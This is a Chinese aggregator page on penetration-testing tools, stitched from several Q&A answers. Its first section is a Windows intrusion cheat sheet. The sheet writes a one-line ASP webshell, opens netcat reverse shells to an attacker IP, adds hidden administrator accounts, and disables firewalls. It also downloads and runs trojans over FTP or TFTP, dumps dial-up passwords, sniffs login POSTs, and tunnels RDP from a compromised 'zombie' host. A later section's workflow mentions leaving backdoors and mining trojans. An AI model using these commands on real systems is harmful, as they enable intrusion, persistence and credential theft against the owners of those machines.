导航:首页 > 编程大全 > 域渗透工具大全

域渗透工具大全

发布时间:2023-03-09 16:46:13

㈠ 常用的windows渗透命令有哪些

echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp
Md hack 创建hack文件
本地nc -vv -p -l 端口
服务器 nc路径 -e cmd路径 ip 端口

Rd hack 删除hack文件夹
Type d:\wwwroot\hack.asp 查看一句话木马的内容
Del d:\wwwroot\hack.asp 删除hack.asp
Dir c:\ 查看c盘根目录全部文件夹和文件信息
Tree e:\ 显示e盘文件目录树
reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber
查看终端确定为3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的键值是多少?值为0是开,为1是关
netstat -ano 能看到3389开启?
net stop policyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s

先net stop sharedacess关闭防火,再net stop PolicyAgent关闭筛选

administrator默认被允许,这种情况下,你需将用户同时加入“Remote Desktop Users”组。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup “Remote Desktop Users” xxx /add 远程桌面用户允许设置。

gpedit.msc

常用系统小命令
gpedit.msc计算机组策略
compmgmt.msc计算机管理
devmgmt.msc设备管理
diskmgmt.msc磁盘管理
fsmgmt.msc共享管理
lusrmgr.ms本地用户管理
notepad写字板write
services.msc服务管理

开启 telnet
@echo off
sc config tlntsvr start= auto
net start telnet

在CMD模式下结束某一进程
一: 通过tasklist 可以查找到相关进程的PID。
语法:tasklist /svc 通过taskkill pid 可以关掉进程。 语法: taskkill /im 进程名 /f
二: ntsd -c q -p PID 可以强行结束运行进程
zxarps.exe -idx 0 -ip 目标的IP -port 80,21,3389 -logfilter “+post,+user,+pass”
dialupass /allusers /stext “c:\1.txt”
========================================================
query user查询登陆用户
logoffID蹬出某用户
net user 查看所有用户
c:\xp3389.exe -a
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\>net1 user guest /active:yes 启用该用户
=========================================================
whoami 查看全系统权限
调系统权限
C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==========================================================
FTP命令行下加账号的命令;很爽。。。
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
============================================================
ftp传马命令
echo open 自己的FTP > cmd.txt
echo 帐户>> cmd.txt
echo 密码>> cmd.txt
echo binary >> cmd.txt
echo get 木马.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木马.exe
木马.exe
del cmd.txt. /q
==============================================================
quote site exec net user 用户名 密码 /add 添加用户
quote site exec net localgroup administrators 用户名 /add
tasklist \svc //shell列进程
==============================================================
sql语句加管理用户
Select MyCmd(“net user”);
select state(“net user”)
select cmdshell(“net user”)
==============================================================
netstat -an
1.查询终端开放端口
netstat -an | find “3389″
================================================================
查询终端3389端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber
================================================================
2.开启2003终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_Dword /d 00000000 /f
================================================================
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
=================================================================
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
=================================================================
5.开启Win2000的终端 (需重启)
先将开启终端的工具上传到目标主机的c:\
然后执行c:\ver3389.exe等待系统重启就可以了
=====================================================================
6.解决终端超出了最大连接数的命令
mstsc /v:ip:3389 /console
=====================================================================
关闭防火墙
net stop sharedaccess
======================================================================
先将双开3389的工具上传到目标主机下的c:\
然后运行命令 c:\3389.exe
======================================================================
Tasklist/SVC >>c:\3389.txt
=====================================================================
查看adsl
Dialupass.exe /allusers /stext “c:\1.txt”
=====================================================================
端口映射篇之lcx使用方法
Lcx 命令
本机运行lcx.exe -listen 3001 3002

c:\lcx.exe -slave 61.184.188.125 3001 肉鸡的内网IP 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
在本机连接: 127.0.0.1:3002
=====================================================================
这里是nc的命令说明:
2.nc反弹提权:
服务器执行: nc位置 -l -p 8080 -t -e cmd位置
监听本地入栈信息
NC地址 cmd地址
————————————————— -p port 打开本地端口
本地执行: telnet + 服务器IP地址 + 446
————————————————— -t 以telnet形式应答入栈请求
传马命令: tftp -i ip地址 get 木马名字.exe -e 程序重定向

额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。
2.降低运行权限
////////////////////////////
现在本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。
在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
—-===============================================================
1.查询终端端口

xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber

通用:regedit /e tsp.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp”
type tsp.reg

2.开启XP&2003终端服务
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3.更改终端端口为20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5.开启Win2000的终端,端口为3389(需重启)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo “Enabled”=”0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo “ShutdownWithoutLogon”=”0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo “EnableAdminTSRemote”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo “TSEnabled”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo “Hotkey”=”1″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg

6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7.禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命令来连接

mstsc /v:ip:3389 /console

9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)

cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
来自文章《windows下面常用的渗透测试命令》

㈡ 渗透测试工具的通用漏洞检测

在获取了目标主机的操作系统、开放端口等基本信息后,通常利用通用漏洞扫描工具检测目标系统所存在的漏洞和弱口令。通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-08-067、oracle的漏洞。由于系统开启了135、139、445、1433、1521等应用程序端口,同时没有及时安装补丁,使得外来主机可以通过相应的端口发送恶意的请求从而获取不应当获得的系统权限。在实际的应用中,如果防火墙做了良好的部署,则对外界展现的端口应该受到严格控制,相应的通用漏洞危害较小。但是如果没有在边界上进行良好的访问控制,则缓冲区溢出漏洞有着极其严重的威胁,会轻易被恶意用户利用获得服务器的最高权限。 X-Scan 是一款国产的漏洞扫描软件,完全免费,无需安装,由国内著名民间黑客组织“安全焦点”完成。X-Scan的功能包括:开放服务、操作系统鉴别、应用系统弱口令、IIS编码漏洞、应用漏洞检测等。
X-Scan通常被用来进行弱口令的检测,其提供的弱口令检测模块包含telnet、ftp、SQL-server、cvs、vnc、smtp、nntp、sock5、imap、pop3、rexec、NT-Server、ssh、www,采用字典攻击的方式,配合恰当的字典生成工具可以完成大部分常用应用软件的弱口令破解工作。X-Scan也提供漏洞检测脚本的加载方式,可以即时的更新扫描模块,同时也提供扫描结果报告功能。 Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
事实上Metasploit提供的是一个通用的漏洞攻击框架,通过它可以方便的获取、开发针对漏洞的攻击。Metasploit将负载控制,编码器,无操作生成器和漏洞整合在一起,成为一种研究高危漏洞的途径,它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。对于开发者来说,需要了解缓冲区溢出的原理、需要编写的漏洞详细情况、payload生成、注入点以及metasploit的漏洞编写规则。而对于普通的渗透测试人员,仅仅只需要安装metasploit,下载最新的漏洞库和shellcode,选择攻击目标,发送测试就可以完成漏洞检测工作。事实上,metasploit不仅提供漏洞检测,还可以进行实际的入侵工作。由于采用入侵脚本时可能对系统造成不可预估的效果,在进行渗透测试时应当仅仅使用测试功能。
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner是一个网站
服务器漏洞扫描软件,它包含有收费和免费两种版本
功能介绍:
1、AcuSensor 技术
2、自动的客户端脚本分析器,允许对 Ajax 和 Web 2.0 应用程序进行安全性测试。
3、业内最先进且深入的 SQL 注入和跨站脚本测试
4、高级渗透测试工具,例如 HTTP Editor 和 HTTP Fuzzer
5、可视化宏记录器帮助您轻松测试 web 表格和受密码保护的区域
6、支持含有 CAPTHCA 的页面,单个开始指令和 Two Factor(双因素)验证机制
7、丰富的报告功能,包括 VISA PCI 依从性报告
8、高速的多线程扫描器轻松检索成千上万个页面
9、智能爬行程序检测 web 服务器类型和应用程序语言
10、Acunetix 检索并分析网站,包括 flash 内容、SOAP 和 AJAX
11、端口扫描 web 服务器并对在服务器上运行的网络服务执行安全检查

㈢ 一个完整的渗透测试流程,分为那几块,每一块有哪些内容

包含以下几个流程:

信息收集

第一步做的就是信息收集,根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。

漏洞探测

当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入 。

漏洞利用

探测到了该网站存在漏洞之后,就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。

内网渗透

当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息。

内网中也有可能存在供内网使用的内网服务器,可以进一步渗透拿下其权限。

痕迹清除

达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马。

撰写渗透测试保告

在完成了渗透测试之后,就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击。

㈣ 渗透测试工具有哪些

1、Kali Linux
不使用Kali Linux作为基本渗透测试操作系统,算不上真正的黑客。Kali Linux是基于Debian的Linux发行版,
设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati
Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。
Kali Linux的前身是BackTrack
Linux,有进攻性安全部门的专业人士维护,它在各个方面都进行了优化,可以作为进攻性渗透测试工具使用。
2、Nmap
Nmap是发现企业网络中任何类型的弱点或漏洞的绝佳工具,它也是审计的很好工具。该工具的作用是获取原始数据包并确定哪些主机在网络的特定段上可用,正在使用什么操作系统,以及识别特定主机的数据包防火墙或过滤器的不同类型和版本正在使用。Nmap对渗透测试过程的任何阶段都很有用并且还是免费的。
3、Wireshark
Wireshark是一个无处不在的工具,可用于了解通过网络的流量。虽然通常用于深入了解日常TCP/IP连接问题,但Wireshark支持对数百种协议的分析,包括对其中许多协议的实时分析和解密支持。如果不熟悉渗透测试,Wireshark是一个必须学习的工具。
4、John the Ripper
John the
Ripper是一个很流行的密码破解工具,是渗透测试工具包中的一个很必要的补充。它可以用来确定数据库中的未知弱点,通过从传统字典中找到的复杂和流行的单词列表,获取文本字符样本,并用与正在生成的密码相同的格式,对其进行加密来达到目的。
5、Hashcat
Hashcat自称世界上最快和最先进的密码恢复应用程序,可能并不是谦虚,懂Hashcat的人肯定知道它的价值。Hashcat让John the
Ripper一筹莫展。它是破解哈希的首选渗透测试工具,Hashcat支持多种密码猜测暴力攻击,包括字典和掩码攻击。
6、Hydra
Hydra在需要在线破解密码时发挥作用,例如SSH或FTP登录、IMAP、IRC、RDP等等。将Hydra指向你想破解的服务,如果你愿意,可以给它传递一个单词列表,然后扣动扳机。像Hydra这样的工具提醒人们为什么限制密码尝试和在几次登录尝试后断开用户连接可以成功地防御攻击者。
7、Sqlmap
Sqlmap,是非常有效的开源的SQL注入工具,并且自动化检测和利用SQL注入缺陷并接管数据库服务器的过程,就像它的网站所说的那样。Sqlmap支持所有常用目标,包括MySQL、oracle、PostgreSQL、Microsoft
SQL、server等。

阅读全文

与域渗透工具大全相关的资料

热点内容
淘宝低价海关扣押苹果 浏览:335
javadouble和float 浏览:303
atmega8下载程序 浏览:819
飞鸽传输文件和qq哪个快 浏览:519
怎样在win10安装winxp 浏览:354
iphone5s照片模糊不清怎么解决 浏览:75
ps文件过大闪退怎么办 浏览:325
中国反诈app是什么梗 浏览:830
cnc如何编程零件程序 浏览:306
怎样把word里面的批注删掉 浏览:807
如何不删数据卸载软件视频 浏览:150
有两个活动网络 浏览:598
cad文件如何虚拟打印 浏览:799
vb编程软件怎么写 浏览:309
ps图层移到另一文件变模糊 浏览:753
腾讯管家强力删除文件 浏览:284
临时大文件传输工具哪个好 浏览:406
网信千金app 浏览:753
bjss 浏览:823
熊猫tvapp怎么领竹子 浏览:863

友情链接